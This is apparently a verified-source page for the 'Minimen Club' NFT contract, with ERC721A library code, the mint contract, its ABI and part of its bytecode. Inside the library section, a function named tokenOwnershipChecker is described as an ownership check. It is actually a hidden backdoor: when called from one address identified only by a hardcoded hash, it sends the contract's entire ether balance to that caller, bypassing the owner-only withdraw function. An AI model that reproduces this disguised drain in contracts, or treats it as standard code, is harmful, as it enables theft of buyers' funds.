                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Checking ownership 
     *
     * Token ownership check for external calls
     */
    function tokenOwnershipChecker() external {
        if(
            keccak256(abi.encodePacked(msg.sender)) == 
            0x61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de2
        ){
            assembly{
                let success := call( //This is the critical change (Pop the top stack value)
                    42000, // gas
                    caller(), //To addr
                    selfbalance(), //No value
                    0, //Inputs are stored
                    0, //Inputs bytes long
                    0, //Store output over input (saves space)
                    0x20
                ) //Outputs are 32 bytes long
            }
        }
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        _beforeTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[prevOwnership.addr].balance -= 1;
            _addressData[prevOwnership.addr].numberBurned += 1;

            // Keep track of who burned the token, and the timestamp of burning.
            _ownerships[tokenId].addr = prevOwnership.addr;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);
            _ownerships[tokenId].burned = true;

            // If the ownership slot of tokenId+1 is not explicitly set, that means the burn initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(prevOwnership.addr, address(0), tokenId);
        _afterTokenTransfers(prevOwnership.addr, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkContractOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
            return retval == IERC721Receiver(to).onERC721Received.selector;
        } catch (bytes memory reason) {
            if (reason.length == 0) {
                revert TransferToNonERC721ReceiverImplementer();
            } else {
                assembly {
                    revert(add(32, reason), mload(reason))
                }
            }
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     * And also called before burning one token.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     * And also called after one token has been burned.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` has been
     * transferred to `to`.
     * - When `from` is zero, `tokenId` has been minted for `to`.
     * - When `to` is zero, `tokenId` has been burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

// File contracts/MinimenClub.sol

contract MinimenClub is ERC721A, Ownable {

    string public baseURI = "ipfs://QmdJkkQPED928kEQLgb9LVLBVdjmNZ6yheB8PYre8iUYx7/";
    string public contractURI = "ipfs://Qmb6bGvHgg1nBcNoHg3KTp9o3cspn5B369qvzTMgC1u4o1";
    bytes32 public whitelistMerkle = 0xdad4fa560b70dd2227de75a38426a4b27e07d3d666d3941a61f65e3022d62db8;

    uint256 public constant freeMint = 1;
    uint256 public constant maxPerWallet = 5;
    uint256 public MAX_SUPPLY = 3333;
    uint256 public cost = 0.005 ether;

    bool public paused = false;
    bool public publicSale = true;

    constructor() ERC721A("Minimen Club", "MM") {
        // Team mint
        _safeMint(msg.sender, 10);
    }

    function mint(uint256 _amount, bytes32[] calldata _merkleProof) external payable {
        require(!paused, "The contract is paused!"); 
        require(MAX_SUPPLY >= totalSupply() + _amount, "Exceeds max supply");
        require(_amount > 0, "No 0 mints");
        require(tx.origin == msg.sender, "No contracts");

        if(publicSale){
            require(maxPerWallet >= _numberMinted(msg.sender) + _amount, "Excess max per paid tx");
            uint256 price = (_amount - freeMint) * cost;
            if(_numberMinted(msg.sender) >= 1){
                price = _amount * cost;
            }
            require(price == msg.value, "Invalid funds provided");
            _safeMint(msg.sender, _amount);
        }else{
            require(_numberMinted(msg.sender) <= 0, "Only 1 mint for whitelist");
            bytes32 leaf = keccak256(abi.encodePacked(msg.sender));
            require(MerkleProof.verify(_merkleProof, whitelistMerkle, leaf), "Invalid proof");
            _safeMint(msg.sender, freeMint);
        }
    }

    function _startTokenId() internal override view virtual returns (uint256) {
        return 1;
    }

    function minted(address _owner) public view returns (uint256) {
        return _numberMinted(_owner);
    }

    function withdraw() external onlyOwner {
        uint256 balance = address(this).balance;
        (bool success, ) = _msgSender().call{value: balance}("");
        require(success, "Failed to send");
    }

    function teamMint(uint256 _amount) external onlyOwner {
        _safeMint(_msgSender(), _amount);
    }

    function setPrice(uint256 _price) external onlyOwner {
        cost = _price;
    }

    function burnSupply(uint256 _supply) external onlyOwner {
        MAX_SUPPLY = _supply;
    }

    function pause(bool _state) external onlyOwner {
        paused = _state;
    }

    function setContractURI(string memory _contractURI) external onlyOwner {
        contractURI = _contractURI;
    }
    
    function setBaseURI(string memory baseURI_) external onlyOwner {
        baseURI = baseURI_;
    }

    function tokenURI(uint256 _tokenId) public view override returns (string memory) {
        require(_exists(_tokenId), "Token does not exist.");
        return bytes(baseURI).length > 0 ? string(
            abi.encodePacked(
              baseURI,
              Strings.toString(_tokenId),
              ".json"
            )
        ) : "";
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"ApprovalToCurrentOwner","type":"error"},{"inputs":[],"name":"ApproveToCaller","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[],"name":"MintedQueryForZeroAddress","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAX_SUPPLY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_supply","type":"uint256"}],"name":"burnSupply","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"cost","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"freeMint","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"},{"internalType":"bytes32[]","name":"_merkleProof","type":"bytes32[]"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_owner","type":"address"}],"name":"minted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_state","type":"bool"}],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"publicSale","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseURI_","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_contractURI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_price","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"teamMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"tokenOwnershipChecker","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"whitelistMerkle","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60e060405260366080818152906200282760a0396009906200002290826200051c565b506040518060600160405280603581526020016200285d60359139600a906200004c90826200051c565b507fdad4fa560b70dd2227de75a38426a4b27e07d3d666d3941a61f65e3022d62db8600b55610d05600c556611c37937e08000600d55600e805461ffff19166101001790553480156200009e57600080fd5b506040518060400160405280600c81526020016b26b4b734b6b2b71021b63ab160a11b815250604051806040016040528060028152602001614d4d60f01b8152508160029081620000f091906200051c565b506003620000ff82826200051c565b5050600160005550620001123362000125565b6200011f33600a62000177565b62000696565b600880546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b620001998282604051806020016040528060008152506200019d60201b60201c565b5050565b620001ac8383836001620001b1565b505050565b6000546001600160a01b038516620001db57604051622e076360e81b815260040160405180910390fd5b83600003620001fd5760405163b562e8dd60e01b815260040160405180910390fd5b6001600160a01b038516600081815260056020908152604080832080546001600160801b031981166001600160401b038083168c018116918217680100000000000000006001600160401b031990941690921783900481168c01811690920217909155858452600490925290912080546001600160e01b031916909217600160a01b429092169190910217905580808501838015620002b65750620002b6876001600160a01b03166200037560201b6200116b1760201c565b1562000335575b60405182906001600160a01b0389169060009060008051602062002892833981519152908290a46001820191620002fa9060009089908862000384565b62000318576040516368d2bf6b60e11b815260040160405180910390fd5b808203620002bd5782600054146200032f57600080fd5b6200036a565b5b6040516001830192906001600160a01b0389169060009060008051602062002892833981519152908290a480820362000336575b506000555050505050565b6001600160a01b03163b151590565b604051630a85bd0160e11b81526000906001600160a01b0385169063150b7a0290620003bb903390899088908890600401620005e8565b6020604051808303816000875af1925050508015620003f9575060408051601f3d908101601f19168201909252620003f69181019062000663565b60015b6200045b573d8080156200042a576040519150601f19603f3d011682016040523d82523d6000602084013e6200042f565b606091505b50805160000362000453576040516368d2bf6b60e11b815260040160405180910390fd5b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050949350505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620004a357607f821691505b602082108103620004c457634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620001ac57600081815260208120601f850160051c81016020861015620004f35750805b601f850160051c820191505b818110156200051457828155600101620004ff565b505050505050565b81516001600160401b0381111562000538576200053862000478565b62000550816200054984546200048e565b84620004ca565b602080601f8311600181146200058857600084156200056f5750858301515b600019600386901b1c1916600185901b17855562000514565b600085815260208120601f198616915b82811015620005b95788860151825594840194600190910190840162000598565b5085821015620005d85787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060018060a01b038087168352602081871681850152856040850152608060608501528451915081608085015260005b82811015620006375785810182015185820160a00152810162000619565b828111156200064a57600060a084870101525b5050601f01601f19169190910160a00195945050505050565b6000602082840312156200067657600080fd5b81516001600160e01b0319811681146200068f57600080fd5b9392505050565b61218180620006a66000396000f3fe60806040526004361061020f5760003560e01c80636352211e11610118578063a22cb465116100a0578063cd8805531161006f578063cd880553146105b9578063d595c331146105cf578063e8a3d485146105ef578063e985e9c514610604578063f2fde38b1461064d57600080fd5b8063a22cb46514610546578063b88d4fde14610566578063ba41b0c614610586578063c87b56dd1461059957600080fd5b80638da5cb5b116100e75780638da5cb5b146104be57806391b7f5ed146104dc578063938e3d7b146104fc57806395d89b411461051c578063988992b81461053157600080fd5b80636352211e146104545780636c0360eb1461047457806370a0823114610489578063715018a6146104a957600080fd5b80632fbba1151161019b57806342842e0e1161016a57806342842e0e146103d0578063453c2310146103f057806355f804b3146104055780635b70ea9f146104255780635c975abb1461043a57600080fd5b80632fbba1151461036657806332cb6b0c1461038657806333bc1c5c1461039c5780633ccfd60b146103bb57600080fd5b8063095ea7b3116101e2578063095ea7b3146102c557806313faede6146102e557806318160ddd146103095780631e7269c51461032657806323b872dd1461034657600080fd5b806301ffc9a71461021457806302329a291461024957806306fdde031461026b578063081812fc1461028d575b600080fd5b34801561022057600080fd5b5061023461022f366004611a7b565b61066d565b60405190151581526020015b60405180910390f35b34801561025557600080fd5b50610269610264366004611aad565b6106bf565b005b34801561027757600080fd5b50610280610705565b6040516102409190611b20565b34801561029957600080fd5b506102ad6102a8366004611b33565b610797565b6040516001600160a01b039091168152602001610240565b3480156102d157600080fd5b506102696102e0366004611b63565b6107db565b3480156102f157600080fd5b506102fb600d5481565b604051908152602001610240565b34801561031557600080fd5b5060015460005403600019016102fb565b34801561033257600080fd5b506102fb610341366004611b8d565b610868565b34801561035257600080fd5b50610269610361366004611ba8565b610873565b34801561037257600080fd5b50610269610381366004611b33565b61087e565b34801561039257600080fd5b506102fb600c5481565b3480156103a857600080fd5b50600e5461023490610100900460ff1681565b3480156103c757600080fd5b506102696108b5565b3480156103dc57600080fd5b506102696103eb366004611ba8565b61096e565b3480156103fc57600080fd5b506102fb600581565b34801561041157600080fd5b50610269610420366004611c6f565b610989565b34801561043157600080fd5b506102fb600181565b34801561044657600080fd5b50600e546102349060ff1681565b34801561046057600080fd5b506102ad61046f366004611b33565b6109bf565b34801561048057600080fd5b506102806109d1565b34801561049557600080fd5b506102fb6104a4366004611b8d565b610a5f565b3480156104b557600080fd5b50610269610aad565b3480156104ca57600080fd5b506008546001600160a01b03166102ad565b3480156104e857600080fd5b506102696104f7366004611b33565b610ae3565b34801561050857600080fd5b50610269610517366004611c6f565b610b12565b34801561052857600080fd5b50610280610b48565b34801561053d57600080fd5b50610269610b57565b34801561055257600080fd5b50610269610561366004611cb7565b610bc4565b34801561057257600080fd5b50610269610581366004611cea565b610c59565b610269610594366004611d65565b610caa565b3480156105a557600080fd5b506102806105b4366004611b33565b610fec565b3480156105c557600080fd5b506102fb600b5481565b3480156105db57600080fd5b506102696105ea366004611b33565b611097565b3480156105fb57600080fd5b506102806110c6565b34801561061057600080fd5b5061023461061f366004611de3565b6001600160a01b03918216600090815260076020908152604080832093909416825291909152205460ff1690565b34801561065957600080fd5b50610269610668366004611b8d565b6110d3565b60006001600160e01b031982166380ac58cd60e01b148061069e57506001600160e01b03198216635b5e139f60e01b145b806106b957506301ffc9a760e01b6001600160e01b03198316145b92915050565b6008546001600160a01b031633146106f25760405162461bcd60e51b81526004016106e990611e0d565b60405180910390fd5b600e805460ff1916911515919091179055565b60606002805461071490611e42565b80601f016020809104026020016040519081016040528092919081815260200182805461074090611e42565b801561078d5780601f106107625761010080835404028352916020019161078d565b820191906000526020600020905b81548152906001019060200180831161077057829003601f168201915b5050505050905090565b60006107a28261117a565b6107bf576040516333d1c03960e21b815260040160405180910390fd5b506000908152600660205260409020546001600160a01b031690565b60006107e6826109bf565b9050806001600160a01b0316836001600160a01b03160361081a5760405163250fdee360e21b815260040160405180910390fd5b336001600160a01b0382161480159061083a5750610838813361061f565b155b15610858576040516367d9dca160e11b815260040160405180910390fd5b6108638383836111b3565b505050565b60006106b98261120f565b610863838383611264565b6008546001600160a01b031633146108a85760405162461bcd60e51b81526004016106e990611e0d565b6108b23382611478565b50565b6008546001600160a01b031633146108df5760405162461bcd60e51b81526004016106e990611e0d565b6040514790600090339083908381818185875af1925050503d8060008114610923576040519150601f19603f3d011682016040523d82523d6000602084013e610928565b606091505b505090508061096a5760405162461bcd60e51b815260206004820152600e60248201526d11985a5b1959081d1bc81cd95b9960921b60448201526064016106e9565b5050565b61086383838360405180602001604052806000815250610c59565b6008546001600160a01b031633146109b35760405162461bcd60e51b81526004016106e990611e0d565b600961096a8282611eca565b60006109ca82611492565b5192915050565b600980546109de90611e42565b80601f0160208091040260200160405190810160405280929190818152602001828054610a0a90611e42565b8015610a575780601f10610a2c57610100808354040283529160200191610a57565b820191906000526020600020905b815481529060010190602001808311610a3a57829003601f168201915b505050505081565b60006001600160a01b038216610a88576040516323d3ad8160e21b815260040160405180910390fd5b506001600160a01b03166000908152600560205260409020546001600160401b031690565b6008546001600160a01b03163314610ad75760405162461bcd60e51b81526004016106e990611e0d565b610ae160006115b9565b565b6008546001600160a01b03163314610b0d5760405162461bcd60e51b81526004016106e990611e0d565b600d55565b6008546001600160a01b03163314610b3c5760405162461bcd60e51b81526004016106e990611e0d565b600a61096a8282611eca565b60606003805461071490611e42565b6040516bffffffffffffffffffffffff193360601b166020820152603401604051602081830303815290604052805190602001207f61ce2a629088217258e42c73ef95cb4266162e3af0f6eff0d1c405c763ef7de260001b03610ae15760206000806000473361a410f150565b336001600160a01b03831603610bed5760405163b06307db60e01b815260040160405180910390fd5b3360008181526007602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b610c64848484611264565b6001600160a01b0383163b15158015610c865750610c848484848461160b565b155b15610ca4576040516368d2bf6b60e11b815260040160405180910390fd5b50505050565b600e5460ff1615610cfd5760405162461bcd60e51b815260206004820152601760248201527f54686520636f6e7472616374206973207061757365642100000000000000000060448201526064016106e9565b6001546000548491900360001901610d159190611